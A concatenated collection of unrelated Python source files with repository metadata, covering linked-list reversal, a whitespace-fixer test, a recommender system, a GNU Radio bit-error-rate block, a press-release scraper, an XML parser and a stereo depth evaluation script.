end.next = None
while(pcur):
temp = pcur.next
pcur.next = prev
prev = pcur
pcur = temp
return prev, start
start = end = head
connect = res = None
step = 0
while(end):
step += 1
if(step == k):
temp = end.next
subhead, subtail = reverse(start, end)
if(res):
connect.next = subhead
else:
res = subhead
connect = subtail
start = end = temp
step = 0
else:
end = end.next
if(start == head):
return head
elif(start):
connect.next = start
return res
|
[
"1350526138@qq.com"
] |
1350526138@qq.com
|
276efbcd6b20cba653bfd60fa8fb2c22d660d55c
|
48f7750776fbd4ba7e71dd3832cf1159222f759e
|
/tests/trailing_whitespace_fixer_test.py
|
1c57b10ee1cf8c58b4da84c30418537434bdfa6e
|
[
"MIT"
] |
permissive
|
exKAZUu/pre-commit-hooks
|
9718bd44aa84ba7a4ab21c34d9f33b628c0b7807
|
b85d7ac38f392a8f8b98732c61005d55c892577b
|
refs/heads/master
| 2021-01-20T10:51:20.996895
| 2014-12-22T00:52:16
| 2014-12-22T03:46:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
from plumbum import local
from pre_commit_hooks.trailing_whitespace_fixer import fix_trailing_whitespace
def test_fixes_trailing_whitespace(tmpdir):
with local.cwd(tmpdir.strpath):
for filename, contents in (
('foo.py', 'foo \nbar \n'),
('bar.py', 'bar\t\nbaz\t\n'),
):
with open(filename, 'w') as f:
f.write(contents) # pragma: no cover (python 2.6 coverage bug)
ret = fix_trailing_whitespace(['foo.py', 'bar.py'])
assert ret == 1
for filename, after_contents in (
('foo.py', 'foo\nbar\n'),
('bar.py', 'bar\nbaz\n'),
):
assert open(filename).read() == after_contents
def test_returns_zero_for_no_changes():
assert fix_trailing_whitespace([__file__]) == 0
|
[
"asottile@umich.edu"
] |
asottile@umich.edu
|
116b0018982e3810edfd8a850cd43d84bac97cff
|
9fc768c541145c1996f2bdb8a5d62d523f24215f
|
/code/Examples/ch5/E_5_11.py
|
1ef351797adac178ddaba4e92fb9cfee5488d852
|
[] |
no_license
|
jumbokh/pyclass
|
3b624101a8e43361458130047b87865852f72734
|
bf2d5bcca4fff87cb695c8cec17fa2b1bbdf2ce5
|
refs/heads/master
| 2022-12-25T12:15:38.262468
| 2020-09-26T09:08:46
| 2020-09-26T09:08:46
| 283,708,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
# E_5_11 功能:重覆產生亂數(0至9的整數)直到產生的值是零時結束。
import random as rd
num=rd.randint(0,9)
count=1
while num!=0:
print(num)
count+=1
num=rd.randint(0,9)
print(num)
print('%s%d%s' %('共產生亂數',count,'次'))
|
[
"jumbokh@gmail.com"
] |
jumbokh@gmail.com
|
e73cbc2e1ed90e881b52a090b01e5ab3a5a0d057
|
54156856a1822a4cd6a7e9305369b5fa33b503ac
|
/python/machine-learning/recommendation/collaborative_filter.py
|
c3be7244ae6f685fe36a376371e9018e7cc9fb31
|
[] |
no_license
|
takasashi/sandbox
|
cafd903e7e376485c7fec05f0b4293078147c09f
|
a23d85258b5525498b57672993b25d54fa08f189
|
refs/heads/master
| 2023-07-09T04:37:28.532448
| 2021-08-09T06:11:30
| 2021-08-09T06:11:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,978
|
py
|
from recommendation_data import dataset
from math import sqrt
print(("山田さんのカレーの評価 : {}".format(
dataset['山田']['カレー'])))
print(("山田さんのうどんの評価 : {}\n".format(
dataset['山田']['うどん'])))
print(("佐藤さんのカレーの評価: {}".format(
dataset['佐藤']['カレー'])))
print(("佐藤さんのうどんの評価: {}\n".format(
dataset['佐藤']['うどん'])))
print("鈴木さんのレーティング: {}\n".format((dataset['鈴木'])))
# 協調フィルタリングの実装
def similarity_score(person1, person2):
# 戻り値は person1 と person2 のユークリッド距離
both_viewed = {} # 双方に共通のアイテムを取得
for item in dataset[person1]:
if item in dataset[person2]:
both_viewed[item] = 1
# 共通のアイテムを持っていなければ 0 を返す
if len(both_viewed) == 0:
return 0
# ユークリッド距離の計算
sum_of_eclidean_distance = []
for item in dataset[person1]:
if item in dataset[person2]:
sum_of_eclidean_distance.append(
pow(dataset[person1][item] - dataset[person2][item], 2))
total_of_eclidean_distance = sum(sum_of_eclidean_distance)
return 1 / (1 + sqrt(total_of_eclidean_distance))
print("山田さんと鈴木さんの類似度 (ユークリッド距離)",
similarity_score('山田', '鈴木'))
def pearson_correlation(person1, person2):
# 両方のアイテムを取得
both_rated = {}
for item in dataset[person1]:
if item in dataset[person2]:
both_rated[item] = 1
number_of_ratings = len(both_rated)
# 共通のアイテムがあるかチェック、無ければ 0 を返す
if number_of_ratings == 0:
return 0
# 各ユーザーのすべての付リファレンスを追加
person1_preferences_sum = sum(
[dataset[person1][item] for item in both_rated])
person2_preferences_sum = sum(
[dataset[person2][item] for item in both_rated])
# 各ユーザーの嗜好の二乗を計算
person1_square_preferences_sum = sum(
[pow(dataset[person1][item], 2) for item in both_rated])
person2_square_preferences_sum = sum(
[pow(dataset[person2][item], 2) for item in both_rated])
# 商品の価値を算出して合計
product_sum_of_both_users = sum(
[dataset[person1][item] * dataset[person2][item] for item in both_rated])
# ピアソンスコアの計算
numerator_value = product_sum_of_both_users - \
(person1_preferences_sum * person2_preferences_sum / number_of_ratings)
denominator_value = sqrt((person1_square_preferences_sum - pow(person1_preferences_sum, 2) / number_of_ratings) * (
person2_square_preferences_sum - pow(person2_preferences_sum, 2) / number_of_ratings))
if denominator_value == 0:
return 0
else:
r = numerator_value / denominator_value
return r
print("山田さんと田中さんの類似度 (ピアソン相関係数)",
(pearson_correlation('山田', '田中')))
def most_similar_users(person, number_of_users):
# 似たユーザーとその類似度を返す
scores = [(pearson_correlation(person, other_person), other_person)
for other_person in dataset if other_person != person]
# 最高の類似度の人物が最初になるようにソートする
scores.sort()
scores.reverse()
return scores[0:number_of_users]
print("山田さんに似た人ベスト 3",
most_similar_users('山田', 3))
def user_reommendations(person):
# 他のユーザーの加重平均によるランキングから推薦を求める
totals = {}
simSums = {}
# rankings_list = []
for other in dataset:
# 自分自身は比較しない
if other == person:
continue
sim = pearson_correlation(person, other)
# print ">>>>>>>",sim
# ゼロ以下のスコアは無視する
if sim <= 0:
continue
for item in dataset[other]:
# まだ所持していないアイテムのスコア
if item not in dataset[person] or dataset[person][item] == 0:
# Similrity * スコア
totals.setdefault(item, 0)
totals[item] += dataset[other][item] * sim
# 類似度の和
simSums.setdefault(item, 0)
simSums[item] += sim
# 正規化されたリストを作成
rankings = [(total / simSums[item], item)
for item, total in list(totals.items())]
rankings.sort()
rankings.reverse()
# 推薦アイテムを返す
recommendataions_list = [
recommend_item for score, recommend_item in rankings]
return recommendataions_list
print("下林さんにおすすめのメニュー",
user_reommendations('下林'))
|
[
"idnanashi@gmail.com"
] |
idnanashi@gmail.com
|
987121413b17f4207dd02018f8528d8c260df6d6
|
e15e3bba52180f86d7769a0b5ffd97f2b640777e
|
/tests/api-with-examples/api_with_examples/common/types.py
|
c15e02213215c2af34bb781b04b5fb4c5e3c2adb
|
[
"MIT"
] |
permissive
|
stjordanis/openapi-client-generator
|
06237ab4489c296aec0c3c5d3c811f8c2a310023
|
a058af4ec28a1e53809273a662fb8cba0157695e
|
refs/heads/master
| 2023-03-16T10:04:38.122121
| 2021-02-27T22:36:18
| 2021-02-27T22:36:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
from enum import Enum
from typing import Optional, Sequence, Any, NamedTuple, Mapping, Union, Tuple, Type
import inflection
from typeit import TypeConstructor, flags
generate_constructor_and_serializer = TypeConstructor
class AttrStyle(Enum):
CAMELIZED = "camelized"
DASHERIZED = "dasherized"
UNDERSCORED = "underscored"
camelized = TypeConstructor & flags.GlobalNameOverride(
lambda x: inflection.camelize(x, uppercase_first_letter=False)
)
dasherized = TypeConstructor & flags.GlobalNameOverride(inflection.dasherize)
underscored = TypeConstructor
AttrOverrides = Mapping[Union[property, Tuple[Type, str]], str]
|
[
"noreply@github.com"
] |
stjordanis.noreply@github.com
|
58a7b1b4074ce5b68a3fb001fdc46c305921fcfd
|
04e26128954d47f4937168d569f800f12cef686d
|
/gnuradio/python/bitErrorRate.py
|
744934e74420d9dd4e07ffc434c01ffb83ae4e8f
|
[] |
no_license
|
franchenstein/tcc
|
02ed9f2666823610c0d025c4b64960813a227bc3
|
b2ec6c2206628672edf004f09c09b68d115bf436
|
refs/heads/master
| 2021-01-13T12:56:30.315840
| 2015-02-10T10:22:34
| 2015-02-10T10:22:34
| 18,018,315
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,090
|
py
|
#!/usr/bin/env python
##################################################
# Gnuradio Python Flow Graph
# Title: Bit Error Rate
# Author: Daniel Franch
# Description: Calculates the BER based on the known original message and the final received message.
# Generated: Fri Aug 1 12:30:06 2014
##################################################
from gnuradio import blocks
from gnuradio import gr
from gnuradio.filter import firdes
import ConfigParser
class bitErrorRate(gr.hier_block2):
def __init__(self):
gr.hier_block2.__init__(
self, "Bit Error Rate",
gr.io_signaturev(2, 2, [gr.sizeof_char*1, gr.sizeof_char*1]),
gr.io_signature(1, 1, gr.sizeof_float*1),
)
##################################################
# Variables
##################################################
self._msgLength_config = ConfigParser.ConfigParser()
self._msgLength_config.read("./configs/sdrConfig.txt")
try: msgLength = self._msgLength_config.getint("main", "key")
except: msgLength = 10000
self.msgLength = msgLength
self._bits_per_byte_config = ConfigParser.ConfigParser()
self._bits_per_byte_config.read("./configs/sdrConfig.txt")
try: bits_per_byte = self._bits_per_byte_config.getint("main", "key")
except: bits_per_byte = 8
self.bits_per_byte = bits_per_byte
intdecim = 100000
if msgLength < intdecim:
intdecim = msgLength
##################################################
# Blocks
##################################################
self.blocks_xor_xx_0 = blocks.xor_bb()
self.blocks_unpack_k_bits_bb_0 = blocks.unpack_k_bits_bb(bits_per_byte)
self.blocks_uchar_to_float_0 = blocks.uchar_to_float()
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vff((1.0/msgLength, ))
self.blocks_integrate_xx_0 = blocks.integrate_ff(intdecim)
##################################################
# Connections
##################################################
self.connect((self.blocks_integrate_xx_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self, 1), (self.blocks_xor_xx_0, 1))
self.connect((self, 0), (self.blocks_xor_xx_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self, 0))
self.connect((self.blocks_xor_xx_0, 0), (self.blocks_unpack_k_bits_bb_0, 0))
self.connect((self.blocks_unpack_k_bits_bb_0, 0), (self.blocks_uchar_to_float_0, 0))
self.connect((self.blocks_uchar_to_float_0, 0), (self.blocks_integrate_xx_0, 0))
# QT sink close method reimplementation
def get_msgLength(self):
return self.msgLength
def set_msgLength(self, msgLength):
self.msgLength = msgLength
self.blocks_multiply_const_vxx_0.set_k((1.0/self.msgLength, ))
def get_bits_per_byte(self):
return self.bits_per_byte
def set_bits_per_byte(self, bits_per_byte):
self.bits_per_byte = bits_per_byte
|
[
"ubuntu@ubuntu.(none)"
] |
ubuntu@ubuntu.(none)
|
86ffd25edee54a08e13df6afc30a3a3348a9b725
|
6bd3ad4389995d6acd5870a8a010d657d5a91b4c
|
/src/adminactions/templatetags/aa_compat.py
|
e3f6ace17242bea3bf45ce0154899e8a7fa1961b
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
timgates42/django-adminactions
|
aa0fa47812c8518ad0a996cac1b52eecc8e47ffb
|
af19dc557811e148b8f74d2a6effcf64afc8e0df
|
refs/heads/master
| 2023-03-16T12:03:40.024049
| 2022-06-26T16:35:03
| 2022-06-26T16:35:03
| 249,811,327
| 0
| 0
|
NOASSERTION
| 2020-03-24T20:31:02
| 2020-03-24T20:31:01
| null |
UTF-8
|
Python
| false
| false
| 185
|
py
|
from django.template import Library
register = Library()
@register.tag
def url(parser, token):
from django.template.defaulttags import url as _url
return _url(parser, token)
|
[
"s.apostolico@gmail.com"
] |
s.apostolico@gmail.com
|
d853928d83b1bb7774836966374126863002bfec
|
02e23da0431623db86c8138bda350a1d526d4185
|
/Archivos Python Documentos/Graficas/.history/tierras_20200222162818.py
|
074ccb95c2262981a0f5e2bffc88e7ea5bad045c
|
[] |
no_license
|
Jaamunozr/Archivos-python
|
d9996d3d10ff8429cd1b4c2b396016a3a5482889
|
1f0af9ba08f12ac27e111fcceed49bbcf3b39657
|
refs/heads/master
| 2022-08-05T14:49:45.178561
| 2022-07-13T13:44:39
| 2022-07-13T13:44:39
| 244,073,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,036
|
py
|
import os
import pylab as pl
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
os.system("clear")
fig = pl.figure()
axx = Axes3D(fig)
raiz=np.sqrt
ln=np.log
X = np.arange(-2, 12, 1)
Y = np.arange(-2, 12, 1)
#X, Y = np.meshgrid(X, Y)
print (np.count_nonzero(X))
l = 2
rho= 100
ik=25
Electrodos=8
E=Electrodos-1
P=np.array([
[0.55, 0.55], #Posicion electrodo A
[4.55, 0.55], #Posicion electrodo B
[8.55, 0.55], #Posicion electrodo C
[0.55, 4.55], #Posicion electrodo D
[8.55, 4.55], #Posicion electrodo E
[0.55, 8.55], #Posicion electrodo F
[4.55, 8.55], #Posicion electrodo G
[8.55, 8.55] #Posicion electrodo H
])
m=np.zeros((Electrodos,0))
V=np.zeros((Electrodos,0))
print(V)
i=0
t=0
while t<=np.count_nonzero(X):
while i<=E:
m[i][0] =raiz((14-(P[i][0]))**2+(14-(P[i][1]))**2)
V[i][0] =ln((l+raiz((m[i][0])**2+l**2))/(m[i][0]))
i += 1
print (V)
print (E)
"""
ma=raiz((X-ax)**2+(Y-ay)**2)
mb=raiz((X-bx)**2+(Y-by)**2)
mc=raiz((X-cx)**2+(Y-cy)**2)
md=raiz((X-dx)**2+(Y-dy)**2)
me=raiz((X-ex)**2+(Y-ey)**2)
mf=raiz((X-fx)**2+(Y-fy)**2)
mg=raiz((X-gx)**2+(Y-gy)**2)
mh=raiz((X-hx)**2+(Y-hy)**2)
va=ln((l+raiz(ma**2+l**2))/ma)
vb=ln((l+raiz(mb**2+l**2))/mb)
vc=ln((l+raiz(mc**2+l**2))/mc)
vd=ln((l+raiz(md**2+l**2))/md)
ve=ln((l+raiz(me**2+l**2))/me)
vf=ln((l+raiz(mf**2+l**2))/mf)
vg=ln((l+raiz(mg**2+l**2))/mg)
vh=ln((l+raiz(mh**2+l**2))/mh)
Vt=((rho*ik)/(2*np.pi))*(va+vb+vc+vd+ve+vf+vg+vh)
print (Vt[::].max())
#print(Vt)
x = X.flatten()
y = Y.flatten()
z = Vt.flatten()
surf = axx.plot_surface(X, Y, Vt, cmap = cm.coolwarm, linewidth=0, antialiased=False)
# Customize the z axis.
axx.set_zlim(300, 3000)
axx.zaxis.set_major_locator(LinearLocator(10))
axx.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
"""
|
[
"jaamunozr@gmail.com"
] |
jaamunozr@gmail.com
|
56af12c570c20f68f2ed9f868404b19006bdf490
|
70e970ce9ec131449b0888388f65f0bb55f098cd
|
/ClosureTests/test/localConfig_2016DEFGH_Tau.py
|
cbb6b9333a4223c9dcec00481c778ed32476b89d
|
[] |
no_license
|
OSU-CMS/DisappTrks
|
53b790cc05cc8fe3a9f7fbd097284c5663e1421d
|
1d1c076863a9f8dbd3f0c077d5821a8333fc5196
|
refs/heads/master
| 2023-09-03T15:10:16.269126
| 2023-05-25T18:37:40
| 2023-05-25T18:37:40
| 13,272,469
| 5
| 12
| null | 2023-09-13T12:15:49
| 2013-10-02T13:58:51
|
Python
|
UTF-8
|
Python
| false
| false
| 503
|
py
|
from DisappTrks.StandardAnalysis.localConfig import *
config_file = "config_2016DEFGH_cfg.py"
intLumi = lumi["HLT_LooseIsoPFTau50_Trk30_eta2p1_v*"]["Tau_2016DEFGH"]
datasetsData = [
'Tau_2016D',
'Tau_2016E',
'Tau_2016F',
'Tau_2016G',
'Tau_2016H',
]
datasets = datasetsBkgd + datasetsData + datasetsSig
#setNJobs (datasets, composite_dataset_definitions, nJobs, 500)
#setDatasetType (datasets, composite_dataset_definitions, types, "bgMC")
#InputCondorArguments["hold"] = "True"
|
[
"ahart@cern.ch"
] |
ahart@cern.ch
|
956f70049baed530b16840b562c15c44f1075815
|
619f28995e61afc6277c6b1ad8a19d08f948bbd9
|
/CrashCourseInPython/test_name_function.py
|
c1e18007364f282be06666ff19699ae17252873e
|
[] |
no_license
|
danhagg/python_bits
|
cb407624d48a52d4fceacd2c4fca762abe3dd1ef
|
c5844fe464c6e896b1597d95f5a89b2cf66dc605
|
refs/heads/master
| 2020-03-18T13:16:53.014910
| 2018-09-17T16:26:06
| 2018-09-17T16:26:06
| 134,773,305
| 1
| 0
| null | 2018-07-11T22:23:09
| 2018-05-24T22:03:08
|
Python
|
UTF-8
|
Python
| false
| false
| 774
|
py
|
import unittest
from name_function import get_formatted_name
# following class inherits from class unittest.TestCase
class NamesTestCase(unittest.TestCase):
"""Tests for 'name_function.py'."""
# method to verify names with 1st and last formatted correctly
# method must start with "test"
def test_first_last_name(self):
"""Do names like 'Janis Joplin' work?"""
formatted_name = get_formatted_name('janis', 'joplin')
self.assertEqual(formatted_name, 'Janis Joplin')
def test_first_last_middle_name(self):
"""Do names like 'Wolfgnag Amadeus Mozart' work"""
formatted_name = get_formatted_name(
'wolfgang', 'mozart', 'amadeus')
self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')
unittest.main()
|
[
"danielhaggerty1976@gmail.com"
] |
danielhaggerty1976@gmail.com
|
c5d84ee44df35183938e7658a8aebaef5e4731ad
|
db575f3401a5e25494e30d98ec915158dd7e529b
|
/BIO_Stocks/AVEO.py
|
2c70d486a632cd0540110768b8144b09fb08d86a
|
[] |
no_license
|
andisc/StockWebScraping
|
b10453295b4b16f065064db6a1e3bbcba0d62bad
|
41db75e941cfccaa7043a53b0e23ba6e5daa958a
|
refs/heads/main
| 2023-08-08T01:33:33.495541
| 2023-07-22T21:41:08
| 2023-07-22T21:41:08
| 355,332,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,074
|
py
|
import requests
from lxml import html
from bs4 import BeautifulSoup
import os
from datetime import date, datetime
from ValidationTools import validateday
from Database_Connections import InsertData, Insert_Logging
def main(id_control):
try:
url = 'https://investor.aveooncology.com/press-releases'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
result = requests.get(url, headers=headers)
#print(result.content.decode())
html_content = result.content.decode()
soup = BeautifulSoup(html_content, 'html.parser')
#print(soup)
table = soup.find('table', attrs={'class':'nirtable collapse-wide'})
#print(table)
table_body = table.find('tbody')
rows = table_body.find_all('tr')
FIRST_ROW_columns = rows[0].find_all('td')
v_article_date = FIRST_ROW_columns[0].text.lstrip().rstrip()
article_desc = FIRST_ROW_columns[1]
#if the process find any article with the today date
istoday, v_art_date = validateday(v_article_date)
if (istoday == True):
v_ticker = os.path.basename(__file__).replace(".py", "")
v_url = article_desc.a.get('href')
v_description = article_desc.text.lstrip().rstrip()
now = datetime.now()
print("URL: " + v_url)
print("DESCRIPTION: " + v_description)
print("ARTICLE_DATE: " + str(now))
# Insert articles
if "https://" in v_url:
InsertData(v_ticker, v_description, v_url, v_art_date)
else:
InsertData(v_ticker, v_description, url, v_art_date)
except Exception:
error_message = "Entrou na excepção ao tratar " + os.path.basename(__file__) + "..."
print(error_message)
Insert_Logging(id_control, 'Detail', error_message)
pass
if __name__ == "__main__":
main()
|
[
"andisc_3@hotmail.com"
] |
andisc_3@hotmail.com
|
0f189006b7427ff0c47c6218323a7613f0be1eea
|
6aee8ef9efcc43a611d1f6d8ebc9ba5c9234d0c7
|
/xml/sample1.py
|
7f3bb35ab48bcab97514ea1ba485832420509784
|
[] |
no_license
|
huython/python_tutorialspoint
|
276bbaba341229d4c2f1b71a4865b8bd7e50b72b
|
dff9e0e53c68403af034a98ba299d75588481293
|
refs/heads/master
| 2020-03-29T15:35:29.202894
| 2018-09-24T08:02:43
| 2018-09-24T08:02:43
| 150,071,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,999
|
py
|
#!/usr/bin/python
import xml.sax
class MovieHandler( xml.sax.ContentHandler ):
def __init__(self):
self.CurrentData = ""
self.type = ""
self.format = ""
self.year = ""
self.rating = ""
self.stars = ""
self.description = ""
# Call when an element starts
def startElement(self, tag, attributes):
self.CurrentData = tag
if tag == "movie":
print("*****Movie*****")
title = attributes["title"]
print("Title:", title)
# Call when an elements ends
def endElement(self, tag):
if self.CurrentData == "type":
print("Type:", self.type)
elif self.CurrentData == "format":
print("Format:", self.format)
elif self.CurrentData == "year":
print("Year:", self.year)
elif self.CurrentData == "rating":
print("Rating:", self.rating)
elif self.CurrentData == "stars":
print("Stars:", self.stars)
elif self.CurrentData == "description":
print("Description:", self.description)
self.CurrentData = ""
# Call when a character is read
def characters(self, content):
if self.CurrentData == "type":
self.type = content
elif self.CurrentData == "format":
self.format = content
elif self.CurrentData == "year":
self.year = content
elif self.CurrentData == "rating":
self.rating = content
elif self.CurrentData == "stars":
self.stars = content
elif self.CurrentData == "description":
self.description = content
if ( __name__ == "__main__"):
# create an XMLReader
parser = xml.sax.make_parser()
# turn off namepsaces
parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# override the default ContextHandler
Handler = MovieHandler()
parser.setContentHandler( Handler )
parser.parse("./xml/movies.xml")
|
[
"huysamdua@yahoo.com"
] |
huysamdua@yahoo.com
|
43524050673b775d0d91efafd58f41dfb3e062a8
|
b6d8570a6ad4891858f475481bd2b7faa9db3df6
|
/avg bg.py
|
da5c282b8c462e864eea2da5d1d0b73d43ed4f82
|
[] |
no_license
|
Mayank-Bhatt-450/mpl-can-jump-bot
|
9c0738f4a9395ecdc3cf61960cac586141ced723
|
1d13bf1fd49e7455c15dbf97d2f28b3882ea5660
|
refs/heads/main
| 2022-12-26T01:47:40.504723
| 2020-10-07T14:44:41
| 2020-10-07T14:44:41
| 302,066,853
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,385
|
py
|
import pyautogui,time
from PIL import Image
import math,PIL
'''
img = pyautogui.screenshot()
img.save('new.jpg')
k=time.time()'''
#8 100
u=[0,0,0]
l=[112,194,127]
def dis(pt1,pt2=(2,35,47)):
#pt1=[170,10,154]
#pt2=(145,35,43)#(145,144,143)#(145,35,43)
distance=math.sqrt(((pt1[0]-pt2[0])**2)+((pt1[1]-pt2[1])**2)+((pt1[2]-pt2[2])**2))
return(distance)
img = Image.open("000.png")#PIL.ImageGrab.grab()#
distance=[]
no=[(254, 231, 94), (254, 208, 100), (254, 186, 108), (254, 163, 115), (254, 147, 119), (254, 117, 129), (254, 94, 135), (254, 71, 143)]
h=0
for y in range(100,900,100):
print(y)
g=[]
k=0
pix=[0,0,0]
pixno=0
for i in range(100):
for x in range(497,505):#,943):
if y>800:
print(x,y+i)
d=img.getpixel((x,y+i))
#print(d)
if d[1]>10 and d[0]>10:#dis(d,[170,10,154])>10 and
pixno+=1
pix[0]+=d[0]
pix[1]+=d[1]
pix[2]+=d[2]
fr=dis(d,no[h])
if k<fr :
k=fr
print(d,',')
distance.append(k)
#no.append((round(pix[0]/pixno),round(pix[1]/pixno),round(pix[2]/pixno)))
#print(k,pix[0],pixno,pix[1],pixno,pix[2],pixno)
print(k,pix[0]/pixno,pix[1]/pixno,pix[2]/pixno)
h+=1
print (no)
print (distance)
|
[
"mayankbhatt457@gmail.com"
] |
mayankbhatt457@gmail.com
|
ee65724f760436a1ddd06deee521690fd06da96f
|
906579c9bb9330d0b35644f2cd45f7cd53881234
|
/test.py
|
968e828b5fcb6089889c756cd9cf3e2128580fb9
|
[] |
no_license
|
albert100121/Stereo-LiDAR-CCVNorm
|
cda767518684ff769c2c4507bed58fe5431ad152
|
c40b09e08c6416ad9f7959aec8ed1160ca216bec
|
refs/heads/master
| 2020-09-05T19:50:33.806036
| 2019-06-21T20:49:33
| 2019-06-21T20:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,615
|
py
|
"""
Testing process.
Usage:
# For KITTI Depth Completion
>> python test.py --model_cfg exp/test/test_options.py --model_path exp/test/ckpt/\[ep-00\]giter-0.ckpt \
--dataset kitti2017 --rgb_dir ./data/kitti2017/rgb --depth_dir ./data/kitti2015/depth
# For KITTI Stereo
>> python test.py --model_cfg exp/test/test_options.py --model_path exp/test/ckpt/\[ep-00\]giter-0.ckpt \
--dataset kitti2015 --root_dir ./data/kitti_stereo/data_scene_flow
"""
import os
import sys
import time
import argparse
import importlib
import random
import numpy as np
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
import torch.backends.cudnn as cudnn
from misc import utils
from misc import metric
from dataset.dataset_kitti2017 import DatasetKITTI2017
from dataset.dataset_kitti2015 import DatasetKITTI2015
DISP_METRIC_FIELD = ['err_3px', 'err_2px', 'err_1px', 'rmse', 'mae']
DEPTH_METRIC_FIELD = ['rmse', 'mae', 'mre', 'irmse', 'imae']
SEED = 100
random.seed(SEED)
np.random.seed(seed=SEED)
cudnn.deterministic = True
cudnn.benchmark = False
torch.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
def parse_arg():
parser = argparse.ArgumentParser(description='Sparse-Depth-Stereo testing')
parser.add_argument('--model_cfg', dest='model_cfg', type=str, default=None,
help='Configuration file (options.py) of the trained model.')
parser.add_argument('--model_path', dest='model_path', type=str, default=None,
help='Path to weight of the trained model.')
parser.add_argument('--dataset', dest='dataset', type=str, default='kitti2017',
help='Dataset used: kitti2015 / kitti2017')
parser.add_argument('--rgb_dir', dest='rgb_dir', type=str, default='./data/kitti2017/rgb',
help='Directory of RGB data for kitti2017.')
parser.add_argument('--depth_dir', dest='depth_dir', type=str, default='./data/kitti2017/depth',
help='Directory of depth data for kitti2015.')
parser.add_argument('--root_dir', dest='root_dir', type=str, default='./data/kitti_stereo/data_scene_flow',
help='Root directory for kitti2015')
parser.add_argument('--random_sampling', dest='random_sampling', type=float, default=None,
help='Perform random sampling on ground truth to obtain sparse disparity map; Only used in kitti2015')
parser.add_argument('--no_cuda', dest='no_cuda', action='store_true',
help='Don\'t use gpu')
parser.set_defaults(no_cuda=False)
args = parser.parse_args()
return args
def main():
# Parse arguments
args = parse_arg()
# Import configuration file
sys.path.append('/'.join((args.model_cfg).split('/')[:-1]))
options = importlib.import_module(((args.model_cfg).split('/')[-1]).split('.')[0])
cfg = options.get_config()
# Define model and load
model = options.get_model(cfg.model_name)
if not args.no_cuda:
model = model.cuda()
train_ep, train_step = utils.load_checkpoint(model, None, None, args.model_path, True)
# Define testing dataset (NOTE: currently using validation set)
if args.dataset == 'kitti2017':
dataset = DatasetKITTI2017(args.rgb_dir, args.depth_dir, 'my_test',
(256, 1216), to_disparity=cfg.to_disparity, # NOTE: set image size to 256x1216
fix_random_seed=True)
elif args.dataset == 'kitti2015':
dataset = DatasetKITTI2015(args.root_dir, 'training', (352, 1216), # NOTE: set image size to 352x1216
args.random_sampling, fix_random_seed=True)
loader = DataLoader(dataset, batch_size=1, shuffle=False, pin_memory=True,
num_workers=4)
# Perform testing
model.eval()
pbar = tqdm(loader)
pbar.set_description('Testing')
disp_meters = metric.Metrics(DISP_METRIC_FIELD)
disp_avg_meters = metric.MovingAverageEstimator(DISP_METRIC_FIELD)
depth_meters = metric.Metrics(DEPTH_METRIC_FIELD)
depth_avg_meters = metric.MovingAverageEstimator(DEPTH_METRIC_FIELD)
infer_time = 0
with torch.no_grad():
for it, data in enumerate(pbar):
# Pack data
if not args.no_cuda:
for k in data.keys():
data[k] = data[k].cuda()
inputs = dict()
inputs['left_rgb'] = data['left_rgb']
inputs['right_rgb'] = data['right_rgb']
if cfg.to_disparity:
inputs['left_sd'] = data['left_sdisp']
inputs['right_sd'] = data['right_sdisp']
else:
inputs['left_sd'] = data['left_sd']
inputs['right_sd'] = data['right_sd']
if args.dataset == 'kitti2017':
target_d = data['left_d']
target_disp = data['left_disp']
img_w = data['width'].item()
# Inference
end = time.time()
pred = model(inputs)
if cfg.to_disparity:
pred_d = utils.disp2depth(pred, img_w)
pred_disp = pred
else:
raise NotImplementedError
infer_time += (time.time() - end)
# Measure performance
if cfg.to_disparity:
# disparity
pred_disp_np = pred_disp.data.cpu().numpy()
target_disp_np = target_disp.data.cpu().numpy()
disp_results = disp_meters.compute(pred_disp_np, target_disp_np)
disp_avg_meters.update(disp_results)
if args.dataset == 'kitti2017':
# depth
pred_d_np = pred_d.data.cpu().numpy()
target_d_np = target_d.data.cpu().numpy()
depth_results = depth_meters.compute(pred_d_np, target_d_np)
depth_avg_meters.update(depth_results)
else:
raise NotImplementedError
infer_time /= len(loader)
if cfg.to_disparity:
disp_avg_results = disp_avg_meters.compute()
print('Disparity metric:')
for key, val in disp_avg_results.items():
print('- {}: {}'.format(key, val))
if args.dataset == 'kitti2017':
depth_avg_results = depth_avg_meters.compute()
print('Depth metric:')
for key, val in depth_avg_results.items():
print('- {}: {}'.format(key, val))
print('Average infer time: {}'.format(infer_time))
if __name__ == '__main__':
main()
|
[
"johnsonwang0810@gmail.com"
] |
johnsonwang0810@gmail.com
|
73b312b68b541356d85fb0d14bea0e3ef11466ee
|
d7c9e5b45128c06997358987c8563fba1387c483
|
/Modules/SortingLists.py
|
bbae23b5e4c47d487e64d78f3928e61214747808
|
[] |
no_license
|
Shadow073180/pythonPractice
|
